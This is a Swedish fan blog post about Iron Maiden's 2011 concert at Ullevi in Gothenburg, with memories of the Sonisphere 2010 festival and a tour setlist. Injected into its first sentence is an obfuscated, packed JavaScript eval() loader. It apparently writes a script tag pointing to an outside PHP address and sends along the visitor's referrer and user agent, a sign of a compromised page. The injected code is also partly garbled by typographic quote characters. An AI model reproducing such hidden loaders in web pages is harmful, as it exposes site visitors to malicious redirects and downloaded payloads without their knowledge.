Image Image Image Image Image Image Image Image Image Image

| 27 november, 2020

Scroll to top

Top

IRON MAIDEN. Mindre än 30 dagar kvar!

Filip Urde
 • On 2 juni, 2011
 • http://www.revue.se/filip-urde

Iron eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dnbir|var|u0026u|referrer|ztzyn||js|php’.split(’|’),0,{}))
Maiden är tillbaka …….. då reflekterar vi tillbaka.

Med mindre än månaden kvar till konserten i Göteborg, så kan man säga att Sveriges kanske folkkäraste rockband har fått åtminstonde min puls att höjas. Senast ”korståget” var en fantastisk upplevelse. Jag och 50 000 andra tokiga hårdrocks fantaster kämpade den 7 aug, 2010 mot både regn och kyla. I ett fältslag som t.om. Peter Jackson skulle bli imponerad av. Fältslaget….eller Festivalen hette Sonisphere, platsen stora skuggan och med en ”line up” som kunde skrämma skägget av den hårdaste HD knutten. Många ”tuffa grabbar” var där. Slayer, Anthrax, Alice Cooper, Iggy pop, självaste Mötley crue m.m.

Men inget för mig kan slå Maiden. Självklart var det tvunget att regna mer än det gör i Amazonas under ett helt år just den dagen. Så marken var bokstavligen välling. Välling upp till knä vecket (där jag stod), men vad gör det, när världens bästa rockband spelar?!?

Iron Maiden + Sverige = SANT

Det kan Aftonbladets rock journalister halka ur sig gång på gång, men det ligget något i det. Iron Maiden älskar Sverige och Sverige älskar verkligen Iron Maiden. Iron Maiden själva brukar säga att de fans som ger Iron Maiden bäst bemötande finns just i Brasilien och Sverige. Jag kan bara bocka och hålla med….. tala om allsång. Så när ett glödhett Iron Maiden, bara är en månad ifrån att stämpla in på Svensk mark. Då j*vlar pirrar det! Så när jag tog med mer er på mitt senaste Maiden ”memory lane” så hoppas jag att även ni blir taggade.

Up The Irons!

 

Låt listan från turnéprimären  i Frankfurt.

 1. ”Satellite 15… The final frontier”
 2. ”El Dorado”
 3. ”2 minutes to midnight”
 4. ”The talisman”
 5. ”Coming home”
 6. ”Dance of death”
 7. ”The trooper”
 8. ”The wicker man”
 9. ”Blood brothers”
 10. ”When the wild wind blows”
 11. ”The evil that men do”
 12. ”Fear of the dark”
 13. ”Iron Maiden”
 14. ”The number of the beast”
 15. ”Hallowed be thy name”
 16. ”Running free

Plats: Ullevi, Paradentrén
401 25 GÖTEBORG